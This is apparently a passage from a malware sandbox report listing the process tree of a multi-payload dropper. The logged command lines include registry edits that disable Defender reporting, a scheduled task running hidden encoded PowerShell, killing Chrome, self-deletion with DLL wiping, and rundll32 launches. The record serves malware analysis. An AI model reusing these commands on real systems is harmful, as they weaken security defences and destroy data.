                      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                    [11] \??\c:\windows\SysWOW64\reg.exe (PID 5604)
                      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                [9] C:\Windows\SysWOW64\schtasks.exe (PID 5132)
                  cmdline: schtasks /CREATE /TN "gnTtiEtDE" /SC once /ST 04:37:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  - Creates scheduled task(s)
                [9] C:\Windows\SysWOW64\schtasks.exe (PID 188)
                  cmdline: schtasks /run /I /tn "gnTtiEtDE"
          [6] C:\Users\Admin\Pictures\Adobe Films\2bHYlcqNQQeRjwzE02NmG57J.exe (PID 1340)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\2bHYlcqNQQeRjwzE02NmG57J.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\5uuYeKGOqmLcQKNQYuUY5QZT.exe (PID 1568)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\5uuYeKGOqmLcQKNQYuUY5QZT.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\UxE0PlDNhTR5MmSA_V9W2kHI.exe (PID 1016)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\UxE0PlDNhTR5MmSA_V9W2kHI.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\ZBWu0vUaiNqltZwYXfrmbFx_.exe (PID 2856)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\ZBWu0vUaiNqltZwYXfrmbFx_.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\_I4uCB0GTOuYCtdIbbea6Mab.exe (PID 2088)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\_I4uCB0GTOuYCtdIbbea6Mab.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\CWCFx2pZzV_Me71KrfEeiIza.exe (PID 1888)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\CWCFx2pZzV_Me71KrfEeiIza.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\fa9NV5kDsHsXUPWw6tiwsxYX.exe (PID 4916)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\fa9NV5kDsHsXUPWw6tiwsxYX.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\1IDu5Y02vpMCU\EasyCalc License Agreement.exe (PID 5632)
              cmdline: "C:\Users\Admin\AppData\Local\Temp\1IDu5Y02vpMCU\EasyCalc License Agreement.exe"
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1744)
        cmdline: C:\Windows\system32\cmd.exe /c Thu04c109370946a.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe (PID 1592)
          cmdline: Thu04c109370946a.exe
          - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\is-OHOAG.tmp\Thu04c109370946a.tmp (PID 896)
            cmdline: "C:\Users\Admin\AppData\Local\Temp\is-OHOAG.tmp\Thu04c109370946a.tmp" /SL5="$201DA,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            [7] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe (PID 1568)
              cmdline: "C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe" /SILENT
              - Executes dropped EXE
              [8] C:\Users\Admin\AppData\Local\Temp\is-0OEJ0.tmp\Thu04c109370946a.tmp (PID 5104)
                cmdline: "C:\Users\Admin\AppData\Local\Temp\is-0OEJ0.tmp\Thu04c109370946a.tmp" /SL5="$301DA,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04c109370946a.exe" /SILENT
                - Executes dropped EXE
                - Loads dropped DLL
                [9] C:\Users\Admin\AppData\Local\Temp\is-5UTO8.tmp\windllhost.exe (PID 4856)
                  cmdline: "C:\Users\Admin\AppData\Local\Temp\is-5UTO8.tmp\windllhost.exe" 77
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1528)
        cmdline: C:\Windows\system32\cmd.exe /c Thu0442fc62eeb857aca.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0442fc62eeb857aca.exe (PID 1144)
          cmdline: Thu0442fc62eeb857aca.exe
          - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1304)
        cmdline: C:\Windows\system32\cmd.exe /c Thu0483c35fbf3ec8d.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1188)
        cmdline: C:\Windows\system32\cmd.exe /c Thu04eef50b2b35a1.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04eef50b2b35a1.exe (PID 1868)
          cmdline: Thu04eef50b2b35a1.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\WerFault.exe (PID 3752)
            cmdline: C:\Windows\system32\WerFault.exe -u -p 1868 -s 2044
            - Program crash
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1096)
        cmdline: C:\Windows\system32\cmd.exe /c Thu0431d38e2544.exe
        - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0431d38e2544.exe (PID 2588)
          cmdline: Thu0431d38e2544.exe
          - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0431d38e2544.exe (PID 5116)
            cmdline: "C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0431d38e2544.exe" -u
            - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1992)
        cmdline: C:\Windows\system32\cmd.exe /c Thu04fb797f99fe7dae8.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04fb797f99fe7dae8.exe
          cmdline: Thu04fb797f99fe7dae8.exe
- Executes dropped EXE
- Modifies registry class
PID:2244 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\c33Ko.Cpl",6⤵PID:1676
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\c33Ko.Cpl",7⤵PID:3592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04115bb33998ce.exe4⤵PID:2552
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04115bb33998ce.exeThu04115bb33998ce.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0460219468fd5c220.exe4⤵PID:2628
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0460219468fd5c220.exeThu0460219468fd5c220.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0460219468fd5c220.exeC:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0460219468fd5c220.exe6⤵PID:1268
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu046f48ffab4707f.exe4⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu046f48ffab4707f.exeThu046f48ffab4707f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4824 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2792
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu04865988bc.exe4⤵PID:2192
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04865988bc.exeThu04865988bc.exe5⤵
- Executes dropped EXE
PID:4872 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu04865988bc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04865988bc.exe" & del C:\ProgramData\*.dll & exit6⤵PID:1120
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu04865988bc.exe /f7⤵
- Kills process with taskkill
PID:2448
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:5824
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0483c35fbf3ec8d.exeThu0483c35fbf3ec8d.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:736 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2132
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3088